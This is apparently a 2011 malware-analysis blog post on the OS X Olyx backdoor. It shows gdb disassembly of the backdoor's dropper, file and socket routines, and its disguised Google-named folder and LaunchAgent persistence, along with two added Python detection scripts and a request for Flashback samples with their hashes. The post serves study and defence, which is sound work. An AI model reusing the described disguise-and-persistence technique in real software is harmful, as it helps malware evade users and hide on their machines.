Thursday, October 27, 2011

OS X backdoor Olyx

OS X malware has been making the news lately, with something new once in a while. The Olyx backdoor was discovered in the summer (Dr.Web, contagiodump); I just recently got a chance to look at it myself. I haven't seen a lot of reversing blogs on this backdoor, so it's a good chance to learn a little bit about reversing malware on OS X :).

I started off by using the file and strings utilities to examine the file: Current events 2009 July 5. The file output shows that this is a Mach-O executable for a 32-bit architecture. The strings output shows a plist file (used for user configurations), an IP address (used by the backdoor), and some functions for managing files (for uploads/downloads).



I opened the file in gdb and disassembled main to understand what the backdoor would do once executed. I noticed calls to functions such as fopen, mkdir, fwrite, fork and execve; the next step was to examine the parameters passed to these functions.




0x00001c7f <main+49>:          mov    DWORD PTR [esp],0x1e08
0x00001c86 <main+56>:         call   0x1f04 <dyld_stub_mkdir>

(gdb) x/s 0x1e08
0x1e08:      "/Library/Application Support/google"

0x00001c93 <main+69>:         mov    DWORD PTR [esp],0x1e30
0x00001c9a <main+76>:         call   0x1eec <dyld_stub_fopen$UNIX2003>

0x00001cba <main+108>:      mov    DWORD PTR [esp],eax
0x00001cbd <main+111>:      call   0x1ef8 <dyld_stub_fwrite$UNIX2003>

0x00001db4 <main+358>:      movl   $0x1e30,(%esp)
0x00001dbb <main+365>:      call   0x1eda <dyld_stub_execve>

(gdb) x/s 0x1e30
0x1e30:      "/Library/Application Support/google/startp"

(gdb) x/s 0x1e80
0x1e80:      "/Library/LaunchAgents/www.google.com.tstart.plist"

The plist file:
<string>/Library/Application Support/Google/startp</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>LaunchOnlyOnce</key>

  • The backdoor creates a folder to disguise itself as a Google application.
  • Creates another executable named startp in the google folder.
  • Creates the plist file that will allow it to run each time the user restarts the computer.
  • Launches the new startp binary.
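As an added example (not the author's code and not anything taken from the sample), here is a small Python check that parses a LaunchAgent plist the way launchd reads it and flags the persistence traits listed above. The sample plist is constructed from the strings recovered earlier; its Label is assumed to match the file name, and the remaining keys are a plausible shape rather than the real file.

```python
import plistlib

# Constructed sample LaunchAgent modelled on the strings recovered above:
# the file /Library/LaunchAgents/www.google.com.tstart.plist and the program
# /Library/Application Support/Google/startp. The Label is assumed to match
# the file name; the surrounding keys are a plausible shape, not the real file.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>www.google.com.tstart</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Library/Application Support/Google/startp</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
  <key>LaunchOnlyOnce</key>
  <true/>
</dict>
</plist>
"""

# Where a legitimately installed program normally lives; a LaunchAgent whose
# program sits elsewhere (e.g. under /Library/Application Support) deserves a look.
EXPECTED_PROGRAM_DIRS = ("/Applications/", "/System/", "/usr/", "/bin/", "/sbin/")

def launch_agent_program(plist):
    """Path launchd will run: Program takes precedence over ProgramArguments[0]."""
    if "Program" in plist:
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None

def assess_launch_agent(plist_bytes):
    """Parse one LaunchAgent plist and list the persistence indicators it shows."""
    plist = plistlib.loads(plist_bytes)
    program = launch_agent_program(plist)
    label = plist.get("Label", "")
    findings = []
    if plist.get("RunAtLoad"):
        findings.append("starts automatically at login (RunAtLoad)")
    if program and not program.startswith(EXPECTED_PROGRAM_DIRS):
        findings.append("program outside standard install dirs: " + program)
    if "google" in label.lower() and program and not program.startswith("/Applications/"):
        findings.append("label borrows a vendor name but program is not an installed app")
    return {"label": label, "program": program, "findings": findings}
```

Run it over every file in /Library/LaunchAgents and ~/Library/LaunchAgents to get a quick triage list; a job that trips all three findings is the pattern this sample shows.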

Without running the program to find the second executable, you can use the hexdump utility and search for the Intel Mach-O magic number "CEFAEDFE" (located at offset 1240).
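The same search, as an added Python example rather than the author's hexdump session: it scans a buffer for embedded Mach-O magic values and decodes the mach_header at each hit, so an embedded image can be located and carved without executing the dropper. The sample buffer is constructed (filler plus a minimal header at offset 1240), not the real Olyx bytes.

```python
import struct

# Mach-O magic values as they appear on disk. A little-endian (Intel) 32-bit
# image stores 0xFEEDFACE as the bytes CE FA ED FE, which is what hexdump
# shows and what the search above looks for. The 64-bit and fat (universal)
# magics are included so the same scan also finds those layouts.
MAGICS = {
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit, little-endian",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit, little-endian",
    b"\xca\xfe\xba\xbe": "Mach-O fat/universal (big-endian header)",
}
FAT_MAGIC = b"\xca\xfe\xba\xbe"
CPU_TYPE_X86 = 7   # <mach/machine.h>
MH_EXECUTE = 2     # <mach-o/loader.h>

def find_embedded_macho(data):
    """Return (offset, description, header) for every Mach-O magic found in
    data. Offset 0 is skipped so only *embedded* images are reported."""
    hits = []
    for magic, desc in MAGICS.items():
        pos = data.find(magic, 1)
        while pos != -1:
            header = None
            if magic != FAT_MAGIC and len(data) >= pos + 28:
                # struct mach_header: magic, cputype, cpusubtype, filetype,
                # ncmds, sizeofcmds, flags (7 x uint32, little-endian)
                f = struct.unpack_from("<7I", data, pos)
                header = {"cputype": f[1], "filetype": f[3], "ncmds": f[4]}
            hits.append((pos, desc, header))
            pos = data.find(magic, pos + 1)
    return sorted(hits, key=lambda h: h[0])

def carve(data, offset):
    """Slice the embedded image out of the container from offset to end."""
    return data[offset:]

# Constructed sample: 1240 bytes of filler standing in for the dropper's own
# code, then a minimal 32-bit x86 MH_EXECUTE header. Not the real sample.
SAMPLE = (b"\x90" * 1240
          + struct.pack("<7I", 0xFEEDFACE, CPU_TYPE_X86, 3, MH_EXECUTE, 0, 0, 0)
          + b"\x00" * 64)

if __name__ == "__main__":
    for off, desc, hdr in find_embedded_macho(SAMPLE):
        print(f"offset {off}: {desc} {hdr}")
```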


I had problems running the binary, maybe due to this?


We can still take a look for anything interesting; the disassembly of main shows that a thread is created.

int pthread_create(pthread_t *thread, const pthread_attr_t *attr,
    void *(*start_routine)(void*), void *arg);

- The thread is created executing start_routine with arg as its sole argument.


Looking at the 3rd parameter, the start routine is at address 0x23de; this is where the party starts. :)



The backdoor uses a set of CFileManager* functions for uploading, downloading and opening files.
Here's an example of opening a file (the child of fork calls execve on the path passed in the second argument, with NULL argv and envp):

Dump of assembler code for function CFileManagerOpenFile:
0x00004b1c <CFileManagerOpenFile+0>:    push   ebp
0x00004b1d <CFileManagerOpenFile+1>:    mov    ebp,esp
0x00004b1f <CFileManagerOpenFile+3>:    sub    esp,0x18
0x00004b22 <CFileManagerOpenFile+6>:    call   0x5c74 <dyld_stub_fork>
0x00004b27 <CFileManagerOpenFile+11>:    mov    edx,0x1
0x00004b2c <CFileManagerOpenFile+16>:    test   eax,eax
0x00004b2e <CFileManagerOpenFile+18>:    jne    0x4b4d <CFileManagerOpenFile+49>
0x00004b30 <CFileManagerOpenFile+20>:    mov    DWORD PTR [esp+0x8],0x0
0x00004b38 <CFileManagerOpenFile+28>:    mov    DWORD PTR [esp+0x4],0x0
0x00004b40 <CFileManagerOpenFile+36>:    mov    eax,DWORD PTR [ebp+0xc]
0x00004b43 <CFileManagerOpenFile+39>:    mov    DWORD PTR [esp],eax
0x00004b46 <CFileManagerOpenFile+42>:    call   0x5c5c <dyld_stub_execve>

The packets are compressed using LZO compression and decompressed when received.
http://www.oberhumer.com/opensource/lzo/


0x00002e20 <CClientSocketOnRead+539>:    mov    DWORD PTR [esp+0xc],ebx
0x00002e24 <CClientSocketOnRead+543>:    mov    DWORD PTR [esp+0x8],edi
0x00002e28 <CClientSocketOnRead+547>:    lea    ecx,[ebp-0x24]
0x00002e2b <CClientSocketOnRead+550>:    mov    DWORD PTR [esp+0x4],ecx
0x00002e2f <CClientSocketOnRead+554>:    mov    eax,DWORD PTR [ebp-0x44]
0x00002e32 <CClientSocketOnRead+557>:    mov    DWORD PTR [esp],eax
0x00002e35 <CClientSocketOnRead+560>:    call   0x459f <uncompress>

Setting up a socket and connecting to the IP address 121.254.173 found earlier with strings. The socket arguments 2, 1, 6 are AF_INET, SOCK_STREAM and IPPROTO_TCP, and the 0x10 passed to connect is sizeof(struct sockaddr_in).

0x00002f66 <ClientSocketConnect+46>:    mov    DWORD PTR [esp+0x8],0x6
0x00002f6e <ClientSocketConnect+54>:    mov    DWORD PTR [esp+0x4],0x1
0x00002f76 <ClientSocketConnect+62>:    mov    DWORD PTR [esp],0x2
0x00002f7d <ClientSocketConnect+69>:    call   0x5d58 <dyld_stub_socket>


0x00002fbc <ClientSocketConnect+132>:    mov    DWORD PTR [esp+0x8],0x10
0x00002fc4 <ClientSocketConnect+140>:    mov    DWORD PTR [esp+0x4],eax
0x00002fc8 <ClientSocketConnect+144>:    mov    eax,DWORD PTR [ebx+0x13c]
0x00002fce <ClientSocketConnect+150>:    mov    DWORD PTR [esp],eax
0x00002fd1 <ClientSocketConnect+153>:    call   0x5c50 <dyld_stub_connect$UNIX2003>


So is malware emerging for OS X, or is this just a phase?



Anyone willing to share Flashback? I'd really appreciate it :).

MD5 hash of Flashback.C sample (actual .pkg): 041ec03a36598a9823fb342cd9840acc
MD5 hash of Flashback.C sample (postinstall): e24979f7bd55a458a33247c5201a6a7d

Good resource for reversing on OS X

http://reverse.put.as/